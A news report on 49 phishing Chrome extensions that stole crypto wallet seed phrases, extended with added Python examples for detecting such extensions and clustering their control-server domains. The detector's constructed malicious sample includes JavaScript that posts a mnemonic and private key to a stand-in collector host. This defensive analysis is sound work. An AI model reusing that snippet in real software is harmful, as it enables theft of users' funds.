Google recently removed 49 phishing extensions from the Chrome Web Store after receiving reports that they were targeting cryptocurrency users' wallet data.
Harry Denley, director of security at cryptocurrency wallet startup MyCrypto, explained in an April 14 Medium post how, with the help of anti-phishing security firm PhishFort, he got the extensions removed from the Chrome Web Store within 24 hours.
The removed extensions included ones that impersonated the Ledger, Trezor and KeepKey hardware wallets and the Jaxx, MyEtherWallet, MetaMask, Exodus and Electrum software wallets.
The extensions prompted users to enter the secrets needed to access a wallet, such as mnemonic (seed) phrases, private keys and keystore files, and sent them to the attackers, who then emptied the wallets. Anyone who holds the seed phrase holds the funds, so the theft needs no further exploit once the phrase has been submitted.
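The harvesting pattern just described (a restore form that asks for the seed phrase, plus a network call that ships it to the attacker's server) is what a reviewer looks for when triaging an unpacked extension. The Python below is an added example, not code from Denley, PhishFort or Google: the two extensions it inspects are constructed here, the wallet host list, the permission strings it flags and the field-name regex are this example's assumptions, and the verdict rule is a heuristic rather than any vendor's detection logic.

```python
"""Static triage of an unpacked browser extension for seed-phrase harvesting.

Added example with constructed inputs; the heuristics are this example's own.
"""
import json
import re
from urllib.parse import urlparse

# Assumption: hosts of the wallet services named in the article.
WALLET_HOSTS = ("myetherwallet.com", "metamask.io", "ledger.com", "trezor.io")
# Assumption: permission strings that grant access to every site.
BROAD_PERMISSIONS = ("<all_urls>", "https://*/*", "*://*/*")
# Field names a wallet-restore form uses for material that must never leave the device.
SECRET_FIELD = re.compile(r"\b(mnemonic|seed|recovery|private[_ ]?key|keystore)\b", re.I)
# fetch()/sendBeacon()/XMLHttpRequest.open() with a literal URL; the URL is captured.
NETWORK_CALL = re.compile(
    r"(?:fetch|navigator\.sendBeacon|\.open)\s*\(\s*(?:['\"]\w+['\"]\s*,\s*)?['\"](https?://[^'\"]+)['\"]"
)

# Constructed sample 1: the popup asks for the recovery phrase and POSTs it off-site.
MALICIOUS_EXTENSION = {
    "manifest.json": json.dumps({
        "name": "Wallet Helper", "version": "1.0", "manifest_version": 2,
        "permissions": ["storage", "https://*/*"],
        "browser_action": {"default_popup": "popup.html"},
        "content_scripts": [{"matches": ["https://www.myetherwallet.com/*"], "js": ["inject.js"]}],
    }),
    "popup.html": '<form id="restore"><textarea name="mnemonic" '
                  'placeholder="Enter your 12-word recovery phrase"></textarea>'
                  '<input type="password" name="privateKey"><button>Restore</button></form>'
                  '<script src="popup.js"></script>',
    "popup.js": "document.getElementById('restore').onsubmit = function (e) {\n"
                "  e.preventDefault();\n"
                "  fetch('https://collector.invalid/api/save', {method: 'POST',\n"
                "    body: JSON.stringify({m: e.target.mnemonic.value, k: e.target.privateKey.value})});\n"
                "};\n",
    "inject.js": "console.log('loaded');\n",
}

# Constructed sample 2: a restore form that keeps the phrase in local extension storage.
BENIGN_EXTENSION = {
    "manifest.json": json.dumps({
        "name": "Local Wallet", "version": "1.0", "manifest_version": 2,
        "permissions": ["storage"], "browser_action": {"default_popup": "popup.html"},
    }),
    "popup.html": '<form id="restore"><textarea name="mnemonic"></textarea></form>'
                  '<script src="popup.js"></script>',
    "popup.js": "document.getElementById('restore').onsubmit = function (e) {\n"
                "  e.preventDefault();\n"
                "  chrome.storage.local.set({mnemonic: e.target.mnemonic.value});\n"
                "};\n",
}


def host_in(url_or_pattern, hosts):
    """True if the URL or match pattern points at one of `hosts` or a subdomain of it."""
    host = urlparse(url_or_pattern).hostname or ""
    return any(host == h or host.endswith("." + h) for h in hosts)


def triage(files):
    """Inspect {filename: text} of an unpacked extension; return (suspicious, findings)."""
    findings = []
    manifest = json.loads(files["manifest.json"])
    for perm in manifest.get("permissions", []):
        if perm in BROAD_PERMISSIONS:
            findings.append(f"manifest: broad host permission {perm}")
    for script in manifest.get("content_scripts", []):
        for pattern in script.get("matches", []):
            if host_in(pattern, WALLET_HOSTS):
                findings.append(f"manifest: content script injected into {pattern}")
    collects_secrets, exfil_hosts = False, set()
    for name, body in files.items():
        if name.endswith(".html") and SECRET_FIELD.search(body):
            collects_secrets = True
            findings.append(f"{name}: form asks for wallet secrets")
        if name.endswith(".js"):
            for url in NETWORK_CALL.findall(body):
                if not host_in(url, WALLET_HOSTS):
                    host = urlparse(url).hostname
                    exfil_hosts.add(host)
                    findings.append(f"{name}: sends data to third-party host {host}")
    # The phishing pattern is the combination: a secret-collecting form plus an off-site sink.
    return collects_secrets and bool(exfil_hosts), findings


if __name__ == "__main__":
    for label, ext in (("malicious", MALICIOUS_EXTENSION), ("benign", BENIGN_EXTENSION)):
        suspicious, findings = triage(ext)
        print(label, "->", "SUSPICIOUS" if suspicious else "ok", findings)
```

Either signal alone is not proof: the benign sample also has a seed-phrase field, because a legitimate restore form needs one, but it never sends the phrase anywhere. The check is purely static, so an extension that assembles the collector URL at run time or fetches it from a remote config would need dynamic analysis with a network capture.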
Some of the extensions also carried fake five-star ratings, but the reviews contained little to no information, ranging from "good" and "helpful app" to "legit extension."
On one extension, the same review reportedly appeared eight times under different user names. The copy-pasted text introduced Bitcoin (BTC) and explained why MyEtherWallet, the wallet that extension impersonated, was the preferred option. MyEtherWallet is an Ethereum wallet and does not support Bitcoin, which makes the review even less credible.
The investigation uncovered 14 control servers behind the extensions, but fingerprinting of those servers showed that several were run by the same actors, with the oldest domain linked to many of the other control servers. Denley concluded that most of the extensions were the work of the same group.
Some of the domains used in the campaign were relatively old, but 80 percent of them were registered in March and April 2020, and most of the extensions were published to the Chrome Web Store this month (April 2020).
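The analysis described above (link control servers that share infrastructure attributes, find the oldest domain in each cluster, and measure how many domains were registered in the campaign window) can be reproduced on a small set of records. The Python below is an added example, not Denley's or PhishFort's tooling: the ten records, the attribute names (registrant e-mail, nameserver, IP) and the March to April 2020 window are constructed here for illustration and are not the 14 servers from the investigation.

```python
"""Cluster phishing control-server domains by shared infrastructure fingerprints.

Added example with constructed records; not the investigation's data or tooling.
"""
from collections import defaultdict
from datetime import date

# Assumption: each server's fingerprint holds a registrant e-mail, a nameserver and an IP.
LINK_KEYS = ("email", "ns", "ip")
# Campaign window from the article: March and April 2020.
CAMPAIGN_WINDOW = (date(2020, 3, 1), date(2020, 4, 30))


def rec(domain, registered, email, ns, ip):
    return {"domain": domain, "registered": registered, "email": email, "ns": ns, "ip": ip}


# Constructed records (reserved .example names and TEST-NET-3 addresses).
RECORDS = [
    rec("restore-wallet-1.example", date(2019, 6, 2), "owner-a@mail.example", "ns1.host-a.example", "203.0.113.10"),
    rec("restore-wallet-2.example", date(2020, 3, 5), "owner-a@mail.example", "ns1.host-b.example", "203.0.113.11"),
    rec("restore-wallet-3.example", date(2020, 3, 12), "owner-b@mail.example", "ns1.host-b.example", "203.0.113.12"),
    rec("restore-wallet-4.example", date(2020, 4, 1), "owner-b@mail.example", "ns1.host-c.example", "203.0.113.13"),
    rec("restore-wallet-5.example", date(2020, 4, 3), "owner-c@mail.example", "ns1.host-c.example", "203.0.113.13"),
    rec("restore-wallet-6.example", date(2020, 4, 7), "owner-c@mail.example", "ns1.host-d.example", "203.0.113.14"),
    rec("restore-wallet-7.example", date(2020, 3, 20), None, "ns1.host-e.example", "203.0.113.10"),
    rec("restore-wallet-8.example", date(2019, 11, 15), "owner-d@mail.example", "ns1.host-f.example", "203.0.113.20"),
    rec("restore-wallet-9.example", date(2020, 4, 10), "owner-d@mail.example", "ns1.host-g.example", "203.0.113.21"),
    rec("restore-wallet-10.example", date(2020, 3, 30), "owner-e@mail.example", "ns1.host-h.example", "203.0.113.30"),
]


def cluster_domains(records):
    """Union-find: two domains land in one cluster if they share any link attribute.

    Returns clusters as sorted name lists, largest cluster first.
    """
    parent = {r["domain"]: r["domain"] for r in records}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    def union(a, b):
        ra, rb = find(a), find(b)
        if ra != rb:
            parent[rb] = ra

    first_seen = {}  # (key, value) -> first domain carrying that attribute
    for r in records:
        for key in LINK_KEYS:
            value = r.get(key)
            if not value:
                continue  # missing attributes (e.g. redacted WHOIS) never link anything
            if (key, value) in first_seen:
                union(first_seen[(key, value)], r["domain"])
            else:
                first_seen[(key, value)] = r["domain"]
    groups = defaultdict(list)
    for r in records:
        groups[find(r["domain"])].append(r["domain"])
    return sorted((sorted(g) for g in groups.values()), key=lambda g: (-len(g), g[0]))


def oldest_domain(records, domains):
    """The earliest-registered domain in a cluster: the likely long-lived anchor of the operator."""
    by_name = {r["domain"]: r for r in records}
    return min(domains, key=lambda d: by_name[d]["registered"])


def share_registered_in_window(records, window=CAMPAIGN_WINDOW):
    """Fraction of domains registered inside [start, end]."""
    start, end = window
    hits = sum(1 for r in records if start <= r["registered"] <= end)
    return hits / len(records)


if __name__ == "__main__":
    for group in cluster_domains(RECORDS):
        print(f"{len(group)} domains, oldest: {oldest_domain(RECORDS, group)}")
    print("registered Mar-Apr 2020:", share_registered_in_window(RECORDS))
```

A single long-lived domain that shares an attribute with a burst of fresh registrations is what ties the burst to one operator, which is the picture the article describes. Real fingerprints should weight the link keys rather than treating them equally as this example does: a shared registrant e-mail is strong evidence, while a shared nameserver at a large hosting provider links unrelated customers and is weak on its own.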
Not the First Phishing Attempt
This is not the first time the community has encountered a malicious Chrome extension targeting crypto users. A Redditor warned the community that he had lost crypto-assets after falling victim to a fake Ledger extension.
Chrome extensions targeting crypto users are common enough that earlier this month MyEtherWallet had to warn its users that its official extension had been removed from the store for supposedly containing malware. The extension was restored soon after the team contacted Google to resolve the issue.